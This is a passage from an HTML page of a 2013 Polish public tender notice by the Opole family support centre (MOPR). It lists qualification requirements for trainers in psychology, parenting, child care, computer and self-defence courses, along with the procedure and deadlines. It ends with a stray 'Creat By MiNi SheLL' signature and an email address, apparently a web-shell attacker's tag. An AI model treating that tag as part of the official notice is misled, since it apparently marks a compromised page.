Dla Zadania 5: warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże co najmniej dwa kursy z zakresu samoobrony dla a co najmniej 10 osób każdy. 

Do wykazów należy dołączyć dokumenty potwierdzające należyte wykonanie usług wskazanych w wykazie.

W przypadku wykazania doświadczenia, które udostępni inny podmiot, Wykonawca do wykazu załącza pisemne zobowiązanie do udostępnienia tego doświadczenia wystawione przez podmiot udostępniający. Zobowiązanie winno być złożone w oryginale.  
Wzór wykazu załączono do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie:
Zadania 1 -  co najmniej jedną osobą z wykształceniem psychologicznym, z minimum rocznym doświadczeniem w pracy  psychologa, która przeprowadziła co najmniej dwa  grupowe treningi kompetencji/rozwoju osobistego/umiejętności interpersonalnych/ umiejętności społecznych.

Zadania 2 i Zadania 3 
- co najmniej dwoma osobami z minimum rocznym doświadczeniem w pracy dydaktycznej  w jednostkach szkolących/szkołach/ uczelniach/ innych placówkach polegającej na prowadzeniu wykładów/ćwiczeń/grup wsparcia/seminariów/kursów/warsztatów/konferencji/poradnictwa 
indywidualnego, które przeprowadziły co najmniej jeden warsztat/szkolenie/trening/grupę wsparcia  dotyczącą problemów opiekuńczo-wychowawczych/kompetencji rodzicielskich/ relacji rodzic-dziecko/
problemów rodzinnych  każda.   
- co najmniej 2 osobami z minimum rocznym doświadczeniem w pracy opiekuńczej/wychowawczej/ dydaktycznej/animacyjnej w jednostkach opieki nad dziećmi/szkołach/ przedszkolach/żłobkach/ innych placówkach polegającej na opiece i prowadzeniu zajęć z dziećmi.   
Zadania 4 
- co najmniej 1 osobą posiadającą wykształcenie informatyczne z minimum rocznym doświadczeniem w prowadzeniu kursów/szkoleń/warsztatów, która przeprowadziła co najmniej jeden kurs/szkolenie/warsztat z zakresu  obsługi komputera.
Zadania  5
- co najmniej 1 osobą  z minimum rocznym doświadczeniem w prowadzeniu kursów/szkoleń/ warsztatów, która przeprowadziła co najmniej jeden kurs/szkolenie/warsztat z zakresu  samoobrony.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust.2b Prawa zamówień publicznych).       

Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie Wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.
W celu potwierdzenia spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający żąda złożenia oświadczenia w formie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych i  doświadczenia niezbędnych do wykonania zamówienia, a także wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami. 

Dla Zadania 1: warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże co najmniej  jedną osobę z wykształceniem psychologicznym, z minimum rocznym doświadczeniem w pracy  psychologa,  która przeprowadziła co najmniej dwa  grupowe treningi kompetencji/rozwoju osobistego/umiejętności interpersonalnych/ umiejętności społecznych.

Dla Zadania 2 i Zadania 3:warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże się:

1) co najmniej dwoma osobami z minimum rocznym doświadczeniem w pracy dydaktycznej  w jednostkach szkolących/szkołach/ uczelniach/ innych placówkach polegającej na prowadzeniu wykładów/ćwiczeń/grup wsparcia/seminariów/kursów/warsztatów/konferencji, które przeprowadziły co najmniej jeden warsztat/szkolenie/trening/grupę wsparcia  dotyczącą problemów opiekuńczo-wychowawczych/kompetencji rodzicielskich/ relacji rodzic-dziecko/problemów rodzinnych, każda.      
2) co najmniej dwoma  osobami z minimum rocznym doświadczeniem w pracy opiekuńczej/wychowawczej/ dydaktycznej/animacyjnej w jednostkach opieki nad dziećmi/szkołach/ przedszkolach/żłobkach/ innych placówkach polegającej na opiece i prowadzeniu zajęć z dziećmi, każda.   



Dla Zadania 4: warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże co najmniej co najmniej 1 osobę posiadającą wykształcenie informatyczne z minimum rocznym doświadczeniem w prowadzeniu kursów/szkoleń/warsztatów, która przeprowadziła co najmniej jeden kurs/szkolenie/warsztat z zakresu  obsługi komputera.

Dla Zadania 5: warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże co najmniej  
1 osobę  z minimum rocznym doświadczeniem w prowadzeniu kursów/szkoleń/ warsztatów, która przeprowadziła co najmniej jeden kurs/szkolenie/warsztat z zakresu  samoobrony.

Wykonawca składający ofertę zobowiązuje się w przypadku podpisania umowy, do skierowania do pracy osoby wskazanej w wykazie. W przypadkach losowych wykluczających zatrudnienie osoby wskazanej w wykazie, Wykonawca będzie zobowiązany do zatrudnienia osoby o tych samych kwalifikacjach zawodowych i doświadczeniu niezbędnym do wykonania zamówienia, a także wykonywanych przez nią czynności. 

W przypadku wykazania w wykazie osoby lub osób, które udostępni inny podmiot, Wykonawca do wykazu załącza pisemne zobowiązanie do udostępnienia danej osoby, wystawione przez podmiot udostępniający. Zobowiązanie winno być złożone w oryginale.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmian postanowień zawartych w umowie w przypadku:
1.Zmiany przepisów prawnych mających wpływ na realizację umowy, a w szczególności na jej zakres i termin.
2. Zmiany przepisów prawnych mających wpływ na cenę umowy, a w szczególności zmiany podatku VAT, wprowadzenia akcyzy.
3. Zmiany wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej.
4. Zmiany umowy pomiędzy Zamawiającym a instytucjami nadzorującymi realizację projektu,
w ramach którego realizowane jest zamówienie.
5. Wyniknięcia rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób 
a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony.
6. Zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno - prawnej, przekształceniem lub połączeniem z inną firmą.
Przewidziane powyżej okoliczności stanowiące podstawę zmian do umowy, stanowią uprawnienie  Zamawiającego nie zaś jego obowiązek  wprowadzania takich zmian. Zmiany postanowień zawartej umowy będą dokonane za zgodą stron, wyłącznie w formie pisemnego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Opolu  ul. Armii Krajowej 36, 45-071 Opole.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.07.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Rodzinie w Opolu  ul. Armii Krajowej 36, 45-071 Opole - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projektu  PROGRAM AKTYWIZACJI SPOŁECZNO ZAWODOWEJ BEZROBOTNYCH ORAZ  NIEAKTYWNYCH ZAWODOWO KLIENTÓW MIEJSKIEGO OŚRODKA POMOCY RODZINIE W OPOLU pn.MOJA PRACA -  MOJA PRZYSZŁOŚĆ. Projekt współfinansowany ze środków   Unii Europejskiej w  ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com